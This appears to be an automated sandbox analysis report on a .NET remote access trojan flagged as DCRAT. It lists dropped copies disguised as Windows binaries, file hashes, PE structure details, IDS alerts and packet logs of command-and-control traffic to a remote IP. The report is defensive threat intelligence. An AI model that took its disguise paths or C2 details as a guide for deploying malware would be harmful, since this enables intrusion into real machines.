C:\Users\user\Music\6dd19aba3e2428

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with very long lines (575), with no line terminators
Category:	dropped
Size (bytes):	575
Entropy (8bit):	5.9073900399866694
Encrypted:	false
SSDEEP:	12:8/lQSvVJNtDR1YFiBK7CJT6vACvXkEavfMPMzGe7HIRsR7f5Gas6NAa:8NVtDY4uCqAAQZBGMAa
MD5:	D26062B58C002C176DF19BD5272E9622
SHA1:	AF2C9AF56050F99F11F18867B8267999439634D8
SHA-256:	2BB66FAF2FAA8C2C733E9C9993974AD1F2781AD194300A8C095026B0BF7C6E3D
SHA-512:	706F603E0EBCC95FE5D8B121DEC1C22F7E02FD8CAE6483F71BEC4CF08997BBDE739136700B035443F28333BD3FD9DE6A82491EEE6A1214ACDE23F6F381A4A68F
Malicious:	false
Preview:	GvW4qCk2Fuo537ftBScnIJ9EkrtYDMp6XELUFUe2m03eN7XHO5uRBea7vRU8TMz2ErhzvLoqxkASPe1mTlJHbY42oOixAfjaBBafahVDQEdbdIrRarprCrbpxoKhm0pSAkQOEVMwQG0X5dZfgRXT02XUkusvXxaaYLa32dMEf3b60DuTPpBVcWbIM6oTnbYcpa9tCgnCETx7bbdgAYfrwF7BuSq5z3bDe8QaEAQtB8RJidrvcHTO5rpkc79u0rNL2tdcKDcAIvqxyycQk4drkNIwTp7GAg3TvFRy9PkZpSFKA2woetJ5OflolqJfFV9m1WCsgnRVUDCRH7wa3SlRW8FPemNSGFTTSdSnzEH1cylLdTho4slxtsQ3RwN4a8POts8npIlzKuzhW3wKFiYXdgkjNYWD0NadiWbuU39wHwm83sgXACz1j1uNIYaQwh86UV8AcC0LjmQr3lqf18DxYi4rlNm6dsAjypoitg58MnS7kDThs5YxeKiwbRYOZ4r1mr2N6IwVDFluQ6Gh4FNiTMEnH2HbIqiS5aV3LFkkIDuZjxgeK0UUqJhZmOGEAUM

C:\Users\user\Music\ApplicationFrameHost.exe

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\ApplicationFrameHost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\DigitalLocker\en-US\7aa03be75bb09d

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with very long lines (500), with no line terminators
Category:	dropped
Size (bytes):	500
Entropy (8bit):	5.8789151648473545
Encrypted:	false
SSDEEP:	12:SR2XZKXyB7uop8FYfoRAHQj97JUKVSfrGYPSYkPkPd:SRtCBtiFRM8YySfrGYPxksF
MD5:	8E40DE918AD311250BDC24906AE12889
SHA1:	3676C24F52F014437E7B73E7CC91FC88AE5C27C8
SHA-256:	60B6EBF5BD60105CE4314DE359AA261E93C10E0ED9413A5213EC44AF25EF8862
SHA-512:	04C817CC6BCC6780ABEF119F88F28F8180D309C5BFBD0712DF4ECE9AF3F6630AF2264F0CB0716D857E02BF74557F6FBC1C024C61A1FA00A2974639CB83C40833
Malicious:	false
Preview:	nZPbpEUWmQRVNlw35Q69fjy0X2Q8q47egzDuS77KwsXD5CTqC5o6ay8DkYEwyVpsTxyXiCl8SwNxLv5Vjj5vPADr19J33LVaDptIN5IAUqnolL1zdtNPZ4dStHgj2rEHawugBxHnb5aiXZFpHUZJ8GBIMbYGZiHmlgNzbVxqmjxdd45TB0biR5JTvlUkYBO2xx70LQOwgthYShpSfEFiHjUqX3EzBNRkV5qq7EIumoCiXuBN6CET6puOcQdRMYvTb6DW18Ua6U5chwTm2039I8opLbOqk0iN3sGaqoW7rnWltRrp70ZVfvKdSXLZun0Gwsiyq25Nd5RelC63uittaMsHimITc7NDxQzBs39F5L2jdq1PbSpL4Gqk9bQDtmvgsOqVN4K0joyOUIn1v31KRBIrjPBRn5VSaV1P9gBgIymQRbP1xYS0ukOqF9v832NnSgy8RY2O1VCdY2aI9JeOnfh0GKJAuCnPk97vnQkYfD8ZiuRMjm9t

C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SystemTemp\Crashpad\attachments\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with very long lines (490), with no line terminators
Category:	dropped
Size (bytes):	490
Entropy (8bit):	5.8582479798457
Encrypted:	false
SSDEEP:	12:9fKRHlAE+Aamk1wl7tx+r5l0xLG3JtxwLO/IS/q18DowuJi:0vAFNmkCoQtmwLe/q1pi
MD5:	1D8E34CDCC63AB4C74BF19005AE95970
SHA1:	0492365C392006291EA2C488496BB9ADED45F39D
SHA-256:	B2343B8CCE4CD90A67B5462B2FD7F2B4EF7302E33718AA3AD2E6BB167521DD48
SHA-512:	0C0B63D79871BE15BB876C146A06C90C9EE1D7ED6DBFE4FE290AD80DC7F967E784247D84421E9590FD444396DB50CEEF8EE39341319C1B66F6FA4E74421D4D5B
Malicious:	false
Preview:	zrw3Z5ofsjGtjgIRV36bHD41l9JxpYeJnjJrv11R4HQJRPaQzqgNSaWvx5Raw10TF6FAXageBpgAxukVi2782Q1MNY40kbfCQ6EUKa3ZJCMm4V7DV52341byF2x9gq4kKdt0qPLI9iz0EOS1a1foilIZfPPRn32dImcamGWFut3WCku0j5ipLPBiVUVa93fGpVscw2OTeZ4zswW4fZsrUNS2l3ESu6F0Oxqq2RDrqPLvVL0j7b5kLyvcDz13y6iiTDl5FpBNVAAFBghZCfUTAeoZBNnCaK3uqncRk5dRZsPKxqahSb0SmPhyZL42C9xLHQZYEPzHBC4SPdmUwGt8TkIaFn1YAlPa4EDgRCdDmtRjVPj5jjF6Py2hI8TaXaGaxeXLaFDunqWkTiFzE6zbfTKGMfYTtCpLm0v12YfdgUSjcROj2dWblp4eTQ84rtBkBL7cxO7qaV5LAln4RyaPqNj75RhlZkwwTshRUvwogq

C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.668413616367881
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	cvXu2RR10n.exe
File size:	2'691'584 bytes
MD5:	97a026b442f5d5739ea3d8565f3a044d
SHA1:	dd409fa09eede943173f5aed10542f378062dcb1
SHA256:	37afdc07792fe92b790bd6ba935889cef87b699d9f1a8f86336076f8cf6e4b72
SHA512:	007b12f6c721ad9681c2013ac0038a23b1dc4bc2fb87c779e85970e820d5f4735c962f05a378ece3a0f23e4288172ccc43b634dffdc12a636673852884dd297d
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
TLSH:	0CC5CF023E44CE21F04A2633C2EF494847B5995127A6F72B7DBA37AE55123A37D0D9CB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb..................(..6......~.(.. ....)...@.. ........................)...........@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x68f77e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6272A3D7 [Wed May 4 16:03:35 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28f730	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x294000	0x218	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x296000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x28d784	0x28d800	9092e76481923de2fa3dcbd14b23d2fd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x290000	0x2fdf	0x3000	0a2e644c3c591bd053381b0413e2d22e	False	0.310302734375	data	3.2431758670346063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x294000	0x218	0x400	53626d80290f507a1fb62fcaf3f0cbe6	False	0.263671875	data	1.8390800949553323	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x296000	0xc	0x200	8b981a390e32d168c69c50e3c3dd7fff	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x294058	0x1c0	ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970	English	United States	0.5223214285714286

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T02:27:23.086033+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49743	5.101.153.201	80	TCP
2025-01-10T02:27:51.177585+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49896	5.101.153.201	80	TCP
2025-01-10T02:28:03.897254+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49957	5.101.153.201	80	TCP
2025-01-10T02:28:13.109275+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49979	5.101.153.201	80	TCP
2025-01-10T02:28:21.932831+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49980	5.101.153.201	80	TCP
2025-01-10T02:28:30.996990+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49981	5.101.153.201	80	TCP
2025-01-10T02:29:04.479336+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49982	5.101.153.201	80	TCP
2025-01-10T02:29:08.966891+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49983	5.101.153.201	80	TCP
2025-01-10T02:29:38.825535+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49984	5.101.153.201	80	TCP
2025-01-10T02:29:43.276421+0100	2034194	ET MALWARE DCRAT Activity (GET)	1	192.168.2.7	49985	5.101.153.201	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 02:27:22.312638998 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:22.317526102 CET	80	49743	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:22.317819118 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:22.319010973 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:22.323837042 CET	80	49743	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:23.020320892 CET	80	49743	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:23.086033106 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:23.151259899 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:23.156089067 CET	80	49743	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:23.373065948 CET	80	49743	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:23.453176975 CET	49743	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:50.454050064 CET	49896	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:50.458930016 CET	80	49896	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:50.459037066 CET	49896	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:50.459189892 CET	49896	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:50.463924885 CET	80	49896	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:51.175741911 CET	80	49896	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:51.177584887 CET	49896	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:27:51.182370901 CET	80	49896	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:51.401977062 CET	80	49896	5.101.153.201	192.168.2.7
Jan 10, 2025 02:27:51.404104948 CET	49896	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:03.122198105 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:03.127121925 CET	80	49957	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:03.127259016 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:03.127602100 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:03.132524967 CET	80	49957	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:03.845150948 CET	80	49957	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:03.897253990 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:03.995207071 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:04.000087976 CET	80	49957	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:04.221096039 CET	80	49957	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:04.231245041 CET	49957	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:12.401807070 CET	49979	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:12.407088995 CET	80	49979	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:12.407152891 CET	49979	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:12.407350063 CET	49979	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:12.412635088 CET	80	49979	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:13.105777025 CET	80	49979	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:13.109275103 CET	49979	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:13.114223003 CET	80	49979	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:13.330416918 CET	80	49979	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:13.333434105 CET	49979	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:21.222090006 CET	49980	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:21.227384090 CET	80	49980	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:21.227700949 CET	49980	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:21.227700949 CET	49980	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:21.232557058 CET	80	49980	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:21.925947905 CET	80	49980	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:21.932831049 CET	49980	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:21.937747955 CET	80	49980	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:22.153879881 CET	80	49980	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:22.157382965 CET	49980	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:30.250713110 CET	49981	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:30.255769968 CET	80	49981	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:30.255856991 CET	49981	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:30.256055117 CET	49981	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:30.260847092 CET	80	49981	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:30.991925001 CET	80	49981	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:30.996989965 CET	49981	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:28:31.001970053 CET	80	49981	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:31.221785069 CET	80	49981	5.101.153.201	192.168.2.7
Jan 10, 2025 02:28:31.225693941 CET	49981	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:03.671956062 CET	49982	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:03.676898956 CET	80	49982	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:03.677062988 CET	49982	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:03.677263975 CET	49982	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:03.682023048 CET	80	49982	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:04.415707111 CET	80	49982	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:04.479336023 CET	49982	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:04.484410048 CET	80	49982	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:04.704885960 CET	80	49982	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:04.820415020 CET	49982	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:08.257559061 CET	49983	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:08.262648106 CET	80	49983	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:08.262722969 CET	49983	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:08.262959957 CET	49983	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:08.267817974 CET	80	49983	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:08.965254068 CET	80	49983	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:08.966891050 CET	49983	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:08.971859932 CET	80	49983	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:09.190159082 CET	80	49983	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:09.192646027 CET	49983	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:38.115185976 CET	49984	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:38.120194912 CET	80	49984	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:38.120281935 CET	49984	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:38.120513916 CET	49984	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:38.125319958 CET	80	49984	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:38.824208021 CET	80	49984	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:38.825535059 CET	49984	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:38.830424070 CET	80	49984	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:39.047207117 CET	80	49984	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:39.051845074 CET	49984	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:42.556185961 CET	49985	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:42.561142921 CET	80	49985	5.101.153.201	192.168.2.7
Jan 10, 2025 02:29:42.561280012 CET	49985	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:42.561369896 CET	49985	80	192.168.2.7	5.101.153.201
Jan 10, 2025 02:29:42.566153049 CET	80	49985	5.101.153.201	192.168.2.7
